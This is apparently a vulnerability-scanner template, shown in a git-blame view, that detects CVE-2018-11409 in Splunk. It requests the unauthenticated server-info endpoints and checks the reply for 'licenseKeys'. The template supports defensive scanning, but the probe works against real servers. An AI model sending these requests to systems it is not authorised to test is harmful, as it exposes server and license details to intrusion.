2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-11409
|
2020-06-30 10:19:43 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Splunk Sensitive Information Disclosure
|
2021-06-09 12:20:56 +00:00
|
|
|
author: harshbothra_
|
2020-06-30 10:19:43 +00:00
|
|
|
severity: medium
|
2021-02-05 19:44:41 +00:00
|
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
|
|
|
|
tags: cve,cve2018,splunk
|
2020-06-30 10:19:43 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
|
2020-06-30 10:25:45 +00:00
|
|
|
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-06-30 10:19:43 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- licenseKeys
|